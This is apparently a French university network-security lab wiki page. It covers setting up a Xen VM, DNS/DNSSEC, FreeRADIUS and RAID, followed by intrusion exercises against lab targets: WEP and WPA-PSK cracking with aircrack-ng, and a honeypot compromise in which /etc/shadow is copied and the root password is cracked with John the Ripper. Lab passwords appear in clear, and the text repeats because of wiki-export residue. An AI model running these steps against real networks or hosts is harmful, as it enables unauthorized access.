On veut créer notre machine virtuelle sur l'hyperviseur (HV) capbreton. Afin de pouvoir télécharger l'image Debian, on utilise tout d'abord la commande suivante :<br />
<br />
$ export http_proxy=http://proxy.plil.fr:3128<br />
<br />
Pour lancer la création de la machine virtuelle, on doit donner le nom de la machine qui sera Bellerose (d'après le thème des noms de bière). Ensuite nous avons l'adresse IP qui nous a été attribuée lors de la répartition des groupes (donc pour nous ce sera 193.48.57.181). On donne aussi l'adresse IP du routeur flottant (193.48.57.190) et le masque du réseau (255.255.255.240 car c'est un /28). On indique également l'emplacement des disques virtuels : /usr/local/xen, le mot de passe pour se connecter à la machine virtuelle : pasglop, et la distribution que nous allons utiliser qui est Debian bullseye.<br />
<br />
$ xen-create-image --hostname=Bellerose --ip=193.48.57.181 --gateway=193.48.57.190 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
On crée ensuite 2 LV de 10 Go (nommés Bellerose1 et Bellerose2) sur le groupe de volume storage.<br />
<br />
$ lvcreate -L10G -n Bellerose1 storage<br />
$ lvcreate -L10G -n Bellerose2 storage<br />
<br />
Puis il faut les formater au format ext4, alors on utilise les commandes suivantes :<br />
<br />
$ mkfs.ext4 /dev/storage/Bellerose1<br />
$ mkfs.ext4 /dev/storage/Bellerose2<br />
<br />
On modifie notre fichier /etc/xen/Bellerose.cfg pour indiquer à la machine virtuelle qu'elle possède les volumes logiques Bellerose1 et Bellerose2 (on ajoute alors 2 lignes dans la fonction disk) et on ajoute le bridge IMA5sc dans la fonction vif.<br />
<br />
$ vim /etc/xen/Bellerose.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Bellerose1,xvda3,w',<br />
'phy:/dev/storage/Bellerose2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.181 ,mac=00:16:3E:FA:D0:95 ,bridge=IMA5sc' ]<br />
<br />
On peut maintenant lancer notre machine virtuelle :<br />
<br />
$ xl create -c /etc/xen/Bellerose.cfg<br />
<br />
Avec la commande :<br />
<br />
$ cat /etc/fstab<br />
<br />
On voit xvda1 et xvda2. On va créer xvda3 et xvda4 pour pouvoir y mettre les répertoires var et home de notre machine virtuelle :<br />
<br />
$ mkdir /mnt/xvda3<br />
$ mkdir /mnt/xvda4<br />
$ mount /dev/xvda3 /mnt/xvda3<br />
$ mount /dev/xvda4 /mnt/xvda4<br />
<br />
Puis on déplace le répertoire var dans le disque xvda4 :<br />
<br />
$ mv /var/* /mnt/xvda4<br />
<br />
Pour monter les disques, on ajoute ces lignes dans le fichier /etc/fstab :<br />
<br />
# /home vers xvda3<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
# /var vers xvda4<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On monte le tout à l'aide de la commande :<br />
<br />
mount -a<br />
<br />
Enfin avec lsblk, on peut voir les deux partitions de notre VM :<br />
<br />
$ lsblk<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
Enfin, nous activons l'IPv6 sur l'interface en modifiant <code>/etc/network/interfaces</code><br />
<br />
iface eth0 inet6 auto<br />
<br />
Pour quitter la VM : CTRL+]<br />
<br />
= Services Internet =<br />
<br />
== Serveur SSh ==<br />
<br />
$ apt install openssh-server<br />
<br />
on édite le fichierde conf <code>/etc/ssh/sshd_config</code> (via ssh key) :<br />
<br />
PermitRootLogin without-password<br />
PubkeyAuthentication yes<br />
<br />
après on reload la conf<br />
<br />
$ systemctl reload ssh<br />
<br />
On génère une clé ssh avec <code>ssh-keygen -t ed25519</code> et on l'ajoute dans <code>/.ssh/authorized_keys</code> et c'est gooooood<br />
<br />
== Serveur DNS ==<br />
<br />
on achète le ndd<br />
<br />
on crée un "Glue Record" pour notre nameserver <code>ns1.belle-rose.site</code><br />
<br />
on install bind<br />
<br />
$ apt install bind9<br />
<br />
on configure <code>/etc/resolv.conf</code><br />
<br />
nameserver 127.0.0.1<br />
<br />
on configure bind <code>/etc/bind/named.conf.local</code><br />
<br />
zone "belle-rose.site" IN {<br />
type master;<br />
file "/etc/bind/db.belle-rose.site";<br />
allow-transfer { 217.70.177.40; };<br />
};<br />
<br />
On ajoute nos ns <code>/etc/bind/db.belle-rose.site</code><br />
<br />
;<br />
; BIND dans ta face<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.belle-rose.site. postmaster.belle-rose.site. (<br />
2 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.belle-rose.site.<br />
@ IN NS ns6.gandi.net.<br />
ns1 IN A 193.48.57.181<br />
<br />
Ensuite on peut tester notre conf avec<br />
<br />
$ host -t any ns1.belle-rose.site localhost<br />
Using domain server:<br />
Name: localhost<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
ns1.belle-rose.site has address 193.48.57.181<br />
<br />
== Certificat ==<br />
<br />
Notre certificat Gandi nous a été retiré de force par quelqu'un de mal intentionné. De ce fait, nous avons utilisé un certificat <code>Let's Encrypt</code>. Après avoir installé <code>certbot</code>, on utilise simplement la commande :<br />
<br />
certbot --apache<br />
<br />
https://www.belle-rose.site/ IZOK<br />
<br />
== DNSSEC ==<br />
<br />
On suit les étapes suivantes :<br />
<br />
1. On ajoute l’option <code>dnssec-enable yes;</code> dans le fichier <code>named.conf.options</code><br />
<br />
2. On crée un répertoire <code>www.belle-rose.site.dnssec</code> pour y générer les clefs<br />
<br />
3. On crée la clef asymétrique de signature de clefs de zone :<br />
<br />
$ dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE www.belle-rose.site<br />
<br />
4. On crée la clef asymétrique de la zone pour signer les enregistrements<br />
<br />
$ dnssec-keygen -a RSASHA1 -b 1024 -n ZONE www.belle-rose.site <br />
<br />
5. renommez les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);<br />
<br />
$ mv Kwww.belle-rose.site.+005+37138.key www.belle-rose.site-ksk.key<br />
$ mv Kwww.belle-rose.site.+005+35638.key www.belle-rose.site-zsk.key<br />
$ mv Kwww.belle-rose.site.+005+37138.private www.belle-rose.site-ksk.private<br />
$ mv Kwww.belle-rose.site.+005+35638.private www.belle-rose.site-zsk.private<br />
<br />
6. incluez les clefs publiques dans votre fichier de zone <code>/etc/bind/db.belle-rose.site</code>, incrémentez le numéro de version de la zone ;<br />
<br />
$include /etc/bind/www.belle-rose.site.dnssec/www.belle-rose.site-ksk.key<br />
$include /etc/bind/www.belle-rose.site.dnssec/www.belle-rose.site-zsk.key<br />
<br />
7. signez les enregistrements de la zone ;<br />
<br />
dnssec-signzone -o www.belle-rose.site -k www.belle-rose.site-ksk ../db.belle-rose.site www.belle-rose.site-zsk<br />
<br />
8. modifiez le fichier <code>named.conf.local</code> pour utiliser la zone signée de suffixe .signed :<br />
<br />
$ vim ../named.conf.local<br />
zone "www.belle-rose.site" IN {<br />
type master;<br />
file "/etc/bind/db.belle-rose.site.signed";<br />
allow-transfer { 217.70.177.40; };<br />
};<br />
<br />
9. il ne reste plus qu’à communiquer la partie publique de la KSK (présente dans le fichier www.belle-rose.site-ksk.key) à votre registrar (par exemple gandi.net, regardez à "Manage DNSSEC" dans la section "DNS servers")<br />
<br />
$ cat www.belle-rose.site-ksk.key <br />
; This is a key-signing key, keyid 37138, for www.belle-rose.site.<br />
; Created: 20220110141246 (Mon Jan 10 14:12:46 2022)<br />
; Publish: 20220110141246 (Mon Jan 10 14:12:46 2022)<br />
; Activate: 20220110141246 (Mon Jan 10 14:12:46 2022)<br />
www.belle-rose.site. IN DNSKEY 257 3 5 AwEAAdj7i1QbWFS5EPthytgpKDLbqx8PWbtArgcXL4zZFFPeWBfD1yVa IP0XjVfzi+4/MaPU778QUy1g7edNar8355/YCWMRQrzIJZN9adpBHBMj XWT2tR9ilLSoB1TmIy6ZC/DZmlR8XShUixG0YDkXFJ7eVyZNpKVAnKKx /jp5foFzs1yCiIBRmE00dQvikn81aGdLOSXOY2UdbxC2rE6VXrs1jYeL 29hD+R/HDJEXf7m+qPSlYVyayKXu3WW8RRMPYp7IqcYCUuM78OKC2qkv //82v8yLyB3ppixJpI7U7OR0K89f4sPASER8CW6bwOE5eee+YWw0BLS5 cu8JukZXbNs=<br />
<br />
= Tests d'intrusion =<br />
<br />
== Exploitation de failles du système ==<br />
<br />
Après plusieurs recherches, nous avons trouvé un petit soft permettant d'audit notre système et y afficher les possibles failles. > https://github.com/mzet-/linux-exploit-suggester<br />
<br />
En suivant la documentation :<br />
<br />
$ wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh<br />
$ chmod +x les.sh && ./les.sh<br />
<br />
On obtient les failles suivantes (audit réalisé sur notre VM) :<br />
<br />
[+] [CVE-2021-27365] linux-iscsi<br />
...<br />
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write<br />
...<br />
[+] [CVE-2019-13272] PTRACE_TRACEME<br />
...<br />
<br />
== Cassage de clef WEP d’un point d’accès WiFi ==<br />
<br />
On commence par rechercher le nom de notre interface. On utilise alors la commande (en root) :<br />
<br />
$ airmon-ng<br />
<br />
On trouve l'interface suivante :<br />
<br />
wlx40a5ef0127d0<br />
<br />
On essaie de démarrer l'interface sur le channel 3 :<br />
<br />
$ airmon-ng start wlx40a5ef0127d0 3<br />
<br />
Or on remarque que la réponse de la commande nous indique que l'interface a été renommé automatiquement "wlan0mon". On ré-utilise la commande précédente avec le nouveau nom d'interface :<br />
<br />
$ airmon-ng start wlan0mon 3<br />
<br />
On écoute ensuite tous les paquets dans l'air :<br />
<br />
$ airodump-ng wlan0mon<br />
<br />
A partir de là, on peut choisir un point d'accès à cracker en utilisant son BSSID (obtenu par la commande précédente). On choisit cracotte06.<br />
<br />
$ aireplay-ng -9 -e cracotte06 -a 04:DA:D2:9C:50:55 wlan0mon<br />
<br />
On peut récupérer les VI générés par le point d'accès en les stockant dans les fichiers output. On donne le channel 4 puisque le point d'accès est sur ce channel :<br />
<br />
$ airodump-ng -c 4 --bssid 04:DA:d2:9C:50:55 -w output wlan0mon<br />
<br />
On effectue de fausses authentifications avec la commande aireplay-ng dans un nouveau terminal :<br />
<br />
$ aireplay-ng -1 0 -e cracotte06 -a 04:DA:D2:9C:50:55 -h 40:A5:EF:01:0E:5F wlan0mon<br />
<br />
L'adresse MAC source donnée après le -h est obtenue lorsque l'on récupère les VI.<br />
<br />
Il faut maintenant laisser tourner la commande de récupération des VI assez longtemps pour obtenir assez de données (pour nous içi il a fallu attendre 40000 datas). On peut ensuite décrypter la clef WEP :<br />
<br />
$ aircrack-ng -b 04:DA:D2:9C:50:55 output*.cap<br />
<br />
On obtient alors :<br />
<br />
KEY FOUND ! [ 55:55:55:55:5A:BC:07:CB:A4:44:44:44:44 ]<br />
Decrypted correctly: 100%<br />
<br />
== Cassage de mot de passe WPA-PSK par force brute ==<br />
<br />
$ airmon-ng<br />
$ airmon-ng start wlan0mon 9<br />
$ airodump-ng wlan0mon<br />
<br />
On choisit le point d'accès kracotte06 à cracker. On récupère son BSSID avec la commande précédente et on utilise :<br />
<br />
$ airodump-ng -c 4 --bssid 44:AD:D9:5F:87:05 -w psk wlan0mon<br />
<br />
On crée le dictionnaire contenant toutes les clefs à tester avec la commande <code>crunch</code><br />
<br />
$ crunch 8 8 0123456789 -o dictionnaire.lst<br />
<br />
Pour savoir si un Handshake a été trouvé, on utilise la commande :<br />
<br />
$ aircrack-ng psk*.cap<br />
<br />
On trouve : <br />
<br />
# BSSID ESSID Encryption<br />
1 44:AD:D9:5F:87:05 kracotte06 WPA (1 handshake)<br />
<br />
On peut alors lancer la commande de test des clefs :<br />
<br />
$ aircrack-ng -w dictionnaire.lst -b 44:AD:D9:5F:87:05 psk*.cap<br />
<br />
== Attaque de type "homme au milieu" par usurpation ARP ==<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
Sur honey.plil.info : <br />
<br />
1. injection SQL<br />
<br />
2. connexion en tant qu'admin<br />
<br />
3. telechargement du fichier "config-db.php" (On remarque que il existe une BDD phpmyadmin) et "database.php" (ce fichier semble lui ne pas nous apporter d'informations)<br />
<br />
4. honey.plil.info/phpmyadmin -> connexion avec les logins trouvés dans le fichier "config-db.php" (phpmyadmin et gencovid19). On trouve alors une table "pma_users" indiquant le nom de plusieurs utilisateurs (totor62, manuals, phpmyadmin et root).<br />
<br />
5. en essayant le mdp "gencovid19" avec ces identifiants sur phpmyadmin : on peut se connecter en tant que "root" sur la BDD et on trouve le mdp de rex dans la bdd "test" et table "users".<br />
<br />
6. connexion en ssh sur rex@honey.plil.info.<br />
<br />
7. comme indication : "le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets". Alors on va créer un fichier de mots de 4 lettre pour ensuite doubler ces mots (exemple : bobo => bobobobo) pour essayer de cracker le mot de passe par la force brute. On créée alors le dictionnaire avec l'utilitaire crunch comme pour obtenir les clefs WEP :<br />
<br />
$ crunch 4 4 abcdefghijklmnopqrstuvwxyz > dico.txt<br />
<br />
Et on double la taille des mots :<br />
<br />
$ sed -i 's/\(.*\)/\1\1/' dico.txt<br />
<br />
On copie ensuite les fichiers "/etc/passwd" et "/etc/shadow" de rex@honey.plil.info sur notre zabeth. <br />
<br />
$ scp rex@honey.plil.info:/etc/passwd .<br />
$ scp rex@honey.plil.info:/etc/shadow .<br />
<br />
On utilise alors l'utilitaire "shadow" pour obtenir un fichier contenant le mot de passe haché de root :<br />
<br />
$ unshadow passwd shadow | head -1 > honey<br />
<br />
Puis on utilise "John the Ripper" pour cracker le mot de passe :<br />
<br />
$ john -w:dico.txt honey<br />
<br />
Après quelques minutes, on peut afficher le mot de passe trouvé :<br />
<br />
$ john --show honey<br />
root:fortfort:0:0:root:/root:/bin/bash<br />
1 password hash cracked, 0 left<br />
<br />
On trouve le mot de passe de root@honey.plil.info qui est "fortfort".<br />
<br />
= Point d'accès Wi-Fi authentifié via FreeRADIUS =<br />
<br />
== Configuration du point d'accès ==<br />
<br />
=== Point d'accès ===<br />
<br />
Tout d'abord il faut configurer l'authentification EAP dans la configuration :<br />
<br />
conf t<br />
<br />
aaa new-model<br />
aaa authentication login eap_rose group radius_rose<br />
radius-server host 193.48.57.181 auth-port 1812 acct-port 1813 key zinzin<br />
aaa group server radius radius_rose<br />
server 193.48.57.181 auth-port 1812 acct-port 1813<br />
exit<br />
<br />
Configurons le SSID :<br />
<br />
conf t<br />
<br />
dot11 ssid SSID_ROSE<br />
vlan 5<br />
authentication open eap eap_rose<br />
authentication network-eap eap_rose<br />
authentication key-management wpa<br />
mbssid guest-mode<br />
exit<br />
exit<br />
<br />
On associe notre SSID à l'interface WIFI :<br />
<br />
conf t<br />
<br />
interface Dot11Radio0<br />
encryption vlan 5 mode ciphers aes-ccm tkip<br />
ssid SSID_ROSE<br />
mbssid<br />
exit<br />
exit<br />
<br />
On paramètre notre VLAN (5)<br />
<br />
conf t<br />
<br />
interface Dot11Radio0.5<br />
encapsulation dot1Q 5<br />
no ip route-cache<br />
bridge-group 5<br />
bridge-group 5 subscriber-loop-control<br />
bridge-group 5 spanning-disabled<br />
bridge-group 5 block-unknown-source<br />
exit<br />
exit<br />
<br />
On configure l'interface filaire<br />
<br />
conf t<br />
<br />
interface GigabitEthernet0.5<br />
encapsulation dot1Q 5<br />
bridge-group 5<br />
exit<br />
exit<br />
<br />
Enfin, on configure l'IP de l'AP et sa gateway<br />
<br />
conf t<br />
<br />
ip default-gateway 10.1.0.1<br />
interface BVI 1<br />
ip address 10.1.0.3 255.255.255.0<br />
exit<br />
exit<br />
<br />
=== Routeur ===<br />
<br />
Commençons par configurer le VLAN 1 <br />
<br />
conf t<br />
<br />
interface vlan 1<br />
ip address 10.1.0.1 255.255.255.0<br />
exit<br />
exit<br />
<br />
Puis on configure le port (ici Gi1/0/3<br />
<br />
conf t<br />
<br />
interface Gi1/0/3<br />
switchport<br />
switchport mode trunk<br />
switchport trunk allowed vlan add 1<br />
exit<br />
exit<br />
<br />
Et voilà mon grand<br />
<br />
== Serveur FreeRADIUS ==<br />
<br />
Installation de freeRADIUS<br />
<br />
apt install freeradius<br />
<br />
On commence par configurer <code>/etc/freeradius/3.0/clients.conf</code> à détailler<br />
<br />
client zozo {<br />
ipaddr = 10.1.0.3/24<br />
secret = zinzin<br />
}<br />
<br />
ensuite <code>/etc/freeradius/3.0/eap.conf</code><br />
<br />
eap {<br />
[...]<br />
default_eap_type = peap<br />
}<br />
<br />
puis <code>/etc/freeradius/3.0/users</code><br />
<br />
[...]<br />
root Cleartext-Password := "glopglop"<br />
<br />
Pour vérifier que tout fonctionne bien, on peut lancer freeradius en mode debug <code>freeradius -X</code> (après avoir au préalable stoppé le processus)<br />
<br />
= Sécurisation des données (RAID 5) =<br />
<br />
Nous avons besoin de 3 LV à rajouter à notre VM :<br />
<br />
$ lvcreate -L1G -n Bellerose-raid1 storage<br />
$ lvcreate -L1G -n Bellerose-raid2 storage<br />
$ lvcreate -L1G -n Bellerose-raid3 storage<br />
<br />
Nous pouvons ainsi les rajouter à la configuration de notre VM (<code>/etc/xen/Bellerose.cfg</code>):<br />
<br />
'phy:/dev/storage/Bellerose-raid1,xvda5,w'<br />
'phy:/dev/storage/Bellerose-raid2,xvda6,w'<br />
'phy:/dev/storage/Bellerose-raid3,xvda7,w'<br />
<br />
Nous pouvons ensuite créer le RAID en relançant la VM et en se connectant dessus.<br />
<br />
$ apt install mdadm<br />
<br />
On va ensuite créer un disque nommé <code>/dev/md0</code> grâce à <code>mdadm</code> :<br />
<br />
$ mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7<br />
<br />
On peut ainsi vérifier que notre RAID 5 est effectif :<br />
<br />
$ lsblk<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
xvda5 202:5 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda6 202:6 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda7 202:7 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
<br />
Enfin il faut monter ce disque fraîchement créé :<br />
<br />
$ mkfs.ext4 /dev/md0<br />
$ mkdir /media/raid<br />
<br />
on ajoute cette ligne dans <code>/etc/fstab</code> :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
puis<br />
<br />
$ mount -a<br />
<br />
et toc<br />
<br />
= Chiffrement des données =<br />
<br />
a</div>Bjacquothttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G6&diff=57744TP sysres IMA5 2021/2022 G62022-01-10T16:38:38Z<p>Bjacquot : /* DNSSEC */</p>
<hr />
<div>__TOC__<br />
<br style="clear: both;"/><br />
<br />
=Création de la machine virtuelle=<br />
<br />
On veut créer notre machine virtuelle sur l'hyperviseur (HV) capbreton. Afin de pouvoir télécharger l'image Debian, on utilise tout d'abord la commande suivante :<br />
<br />
$ export http_proxy=http://proxy.plil.fr:3128<br />
<br />
Pour lancer la création de la machine virtuelle, on doit donner le nom de la machine qui sera Bellerose (d'après le thème des noms de bière). Ensuite nous avons l'adresse IP qui nous a été attribuée lors de la répartition des groupes (donc pour nous ce sera 193.48.57.181). On donne aussi l'adresse IP du routeur flottant (193.48.57.190) et le masque du réseau (255.255.255.240 car c'est un /28). On indique également l'emplacement des disques virtuels : /usr/local/xen, le mot de passe pour se connecter à la machine virtuelle : pasglop, et la distribution que nous allons utiliser qui est Debian bullseye.<br />
<br />
$ xen-create-image --hostname=Bellerose --ip=193.48.57.181 --gateway=193.48.57.190 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
On crée ensuite 2 LV de 10 Go (nommés Bellerose1 et Bellerose2) sur le groupe de volume storage.<br />
<br />
$ lvcreate -L10G -n Bellerose1 storage<br />
$ lvcreate -L10G -n Bellerose2 storage<br />
<br />
Puis il faut les formater au format ext4, alors on utilise les commandes suivantes :<br />
<br />
$ mkfs.ext4 /dev/storage/Bellerose1<br />
$ mkfs.ext4 /dev/storage/Bellerose2<br />
<br />
On modifie notre fichier /etc/xen/Bellerose.cfg pour indiquer à la machine virtuelle qu'elle possède les volumes logiques Bellerose1 et Bellerose2 (on ajoute alors 2 lignes dans la fonction disk) et on ajoute le bridge IMA5sc dans la fonction vif.<br />
<br />
$ vim /etc/xen/Bellerose.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Bellerose1,xvda3,w',<br />
'phy:/dev/storage/Bellerose2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.181 ,mac=00:16:3E:FA:D0:95 ,bridge=IMA5sc' ]<br />
<br />
On peut maintenant lancer notre machine virtuelle :<br />
<br />
$ xl create -c /etc/xen/Bellerose.cfg<br />
<br />
Avec la commande :<br />
<br />
$ cat /etc/fstab<br />
<br />
On voit xvda1 et xvda2. On va créer xvda3 et xvda4 pour pouvoir y mettre les répertoires var et home de notre machine virtuelle :<br />
<br />
$ mkdir /mnt/xvda3<br />
$ mkdir /mnt/xvda4<br />
$ mount /dev/xvda3 /mnt/xvda3<br />
$ mount /dev/xvda4 /mnt/xvda4<br />
<br />
Puis on déplace le répertoire var dans le disque xvda4 :<br />
<br />
$ mv /var/* /mnt/xvda4<br />
<br />
Pour monter les disques, on ajoute ces lignes dans le fichier /etc/fstab :<br />
<br />
# /home vers xvda3<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
# /var vers xvda4<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On monte le tout à l'aide de la commande :<br />
<br />
mount -a<br />
<br />
Enfin avec lsblk, on peut voir les deux partitions de notre VM :<br />
<br />
$ lsblk<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
Enfin, nous activons l'IPv6 sur l'interface en modifiant <code>/etc/network/interfaces</code><br />
<br />
iface eth0 inet6 auto<br />
<br />
Pour quitter la VM : CTRL+]<br />
<br />
= Services Internet =<br />
<br />
== Serveur SSh ==<br />
<br />
$ apt install openssh-server<br />
<br />
on édite le fichierde conf <code>/etc/ssh/sshd_config</code> (via ssh key) :<br />
<br />
PermitRootLogin without-password<br />
PubkeyAuthentication yes<br />
<br />
après on reload la conf<br />
<br />
$ systemctl reload ssh<br />
<br />
On génère une clé ssh avec <code>ssh-keygen -t ed25519</code> et on l'ajoute dans <code>/.ssh/authorized_keys</code> et c'est gooooood<br />
<br />
== Serveur DNS ==<br />
<br />
on achète le ndd<br />
<br />
on crée un "Glue Record" pour notre nameserver <code>ns1.belle-rose.site</code><br />
<br />
on install bind<br />
<br />
$ apt install bind9<br />
<br />
on configure <code>/etc/resolv.conf</code><br />
<br />
nameserver 127.0.0.1<br />
<br />
on configure bind <code>/etc/bind/named.conf.local</code><br />
<br />
zone "belle-rose.site" IN {<br />
type master;<br />
file "/etc/bind/db.belle-rose.site";<br />
allow-transfer { 217.70.177.40; };<br />
};<br />
<br />
On ajoute nos ns <code>/etc/bind/db.belle-rose.site</code><br />
<br />
;<br />
; BIND dans ta face<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.belle-rose.site. postmaster.belle-rose.site. (<br />
2 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.belle-rose.site.<br />
@ IN NS ns6.gandi.net.<br />
ns1 IN A 193.48.57.181<br />
<br />
Ensuite on peut tester notre conf avec<br />
<br />
$ host -t any ns1.belle-rose.site localhost<br />
Using domain server:<br />
Name: localhost<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
ns1.belle-rose.site has address 193.48.57.181<br />
<br />
== Certificat ==<br />
<br />
Notre certificat Gandi nous a été retiré de force par quelqu'un de mal intentionné. De ce fait, nous avons utilisé un certificat <code>Let's Encrypt</code>. Après avoir installé <code>certbot</code>, on utilise simplement la commande :<br />
<br />
certbot --apache<br />
<br />
https://www.belle-rose.site/ IZOK<br />
<br />
== DNSSEC ==<br />
<br />
On suit les étapes suivantes :<br />
<br />
1. On ajoute l’option <code>dnssec-enable yes;</code> dans le fichier <code>named.conf.options</code><br />
<br />
2. On crée un répertoire <code>www.belle-rose.site.dnssec</code> pour y générer les clefs<br />
<br />
3. On crée la clef asymétrique de signature de clefs de zone :<br />
<br />
$ dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE www.belle-rose.site<br />
<br />
4. On crée la clef asymétrique de la zone pour signer les enregistrements<br />
<br />
$ dnssec-keygen -a RSASHA1 -b 1024 -n ZONE www.belle-rose.site <br />
<br />
5. renommez les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);<br />
<br />
$ mv Kwww.belle-rose.site.+005+37138.key www.belle-rose.site-ksk.key<br />
$ mv Kwww.belle-rose.site.+005+35638.key www.belle-rose.site-zsk.key<br />
$ mv Kwww.belle-rose.site.+005+35638.private www.belle-rose.site-zsk.private<br />
<br />
6. incluez les clefs publiques dans votre fichier de zone, incrémentez le numéro de version de la zone ;<br />
<br />
$include /etc/bind/<nom_de_zone>.dnssec/<nom_de_zone>-ksk.key<br />
$include /etc/bind/<nom_de_zone>.dnssec/<nom_de_zone>-zsk.key<br />
<br />
<br />
7. signez les enregistrements de la zone ;<br />
<br />
dnssec-signzone -o <nom_de_zone> -k <nom_de_zone>-ksk ../<nom_de_zone> <nom_de_zone>-zsk<br />
<br />
8. modifiez le fichier named.conf.local pour utiliser la zone signée de suffixe .signed ;<br />
9. il ne reste plus qu’à communiquer la partie publique de la KSK (présente dans le fichier <nom_de_zone>-ksk.key) à votre registrar (par exemple gandi.net, regardez à "Manage DNSSEC" dans la section "DNS servers")<br />
<br />
= Tests d'intrusion =<br />
<br />
== Exploitation de failles du système ==<br />
<br />
Après plusieurs recherches, nous avons trouvé un petit soft permettant d'audit notre système et y afficher les possibles failles. > https://github.com/mzet-/linux-exploit-suggester<br />
<br />
En suivant la documentation :<br />
<br />
$ wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh<br />
$ chmod +x les.sh && ./les.sh<br />
<br />
On obtient les failles suivantes (audit réalisé sur notre VM) :<br />
<br />
[+] [CVE-2021-27365] linux-iscsi<br />
...<br />
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write<br />
...<br />
[+] [CVE-2019-13272] PTRACE_TRACEME<br />
...<br />
<br />
== Cassage de clef WEP d’un point d’accès WiFi ==<br />
<br />
On commence par rechercher le nom de notre interface. On utilise alors la commande (en root) :<br />
<br />
$ airmon-ng<br />
<br />
On trouve l'interface suivante :<br />
<br />
wlx40a5ef0127d0<br />
<br />
On essaie de démarrer l'interface sur le channel 3 :<br />
<br />
$ airmon-ng start wlx40a5ef0127d0 3<br />
<br />
Or on remarque que la réponse de la commande nous indique que l'interface a été renommé automatiquement "wlan0mon". On ré-utilise la commande précédente avec le nouveau nom d'interface :<br />
<br />
$ airmon-ng start wlan0mon 3<br />
<br />
On écoute ensuite tous les paquets dans l'air :<br />
<br />
$ airodump-ng wlan0mon<br />
<br />
A partir de là, on peut choisir un point d'accès à cracker en utilisant son BSSID (obtenu par la commande précédente). On choisit cracotte06.<br />
<br />
$ aireplay-ng -9 -e cracotte06 -a 04:DA:D2:9C:50:55 wlan0mon<br />
<br />
On peut récupérer les VI générés par le point d'accès en les stockant dans les fichiers output. On donne le channel 4 puisque le point d'accès est sur ce channel :<br />
<br />
$ airodump-ng -c 4 --bssid 04:DA:d2:9C:50:55 -w output wlan0mon<br />
<br />
On effectue de fausses authentifications avec la commande aireplay-ng dans un nouveau terminal :<br />
<br />
$ aireplay-ng -1 0 -e cracotte06 -a 04:DA:D2:9C:50:55 -h 40:A5:EF:01:0E:5F wlan0mon<br />
<br />
L'adresse MAC source donnée après le -h est obtenue lorsque l'on récupère les VI.<br />
<br />
Il faut maintenant laisser tourner la commande de récupération des VI assez longtemps pour obtenir assez de données (pour nous içi il a fallu attendre 40000 datas). On peut ensuite décrypter la clef WEP :<br />
<br />
$ aircrack-ng -b 04:DA:D2:9C:50:55 output*.cap<br />
<br />
On obtient alors :<br />
<br />
KEY FOUND ! [ 55:55:55:55:5A:BC:07:CB:A4:44:44:44:44 ]<br />
Decrypted correctly: 100%<br />
<br />
== Cassage de mot de passe WPA-PSK par force brute ==<br />
<br />
$ airmon-ng<br />
$ airmon-ng start wlan0mon 9<br />
$ airodump-ng wlan0mon<br />
<br />
On choisit le point d'accès kracotte06 à cracker. On récupère son BSSID avec la commande précédente et on utilise :<br />
<br />
$ airodump-ng -c 4 --bssid 44:AD:D9:5F:87:05 -w psk wlan0mon<br />
<br />
On crée le dictionnaire contenant toutes les clefs à tester avec la commande <code>crunch</code><br />
<br />
$ crunch 8 8 0123456789 -o dictionnaire.lst<br />
<br />
Pour savoir si un Handshake a été trouvé, on utilise la commande :<br />
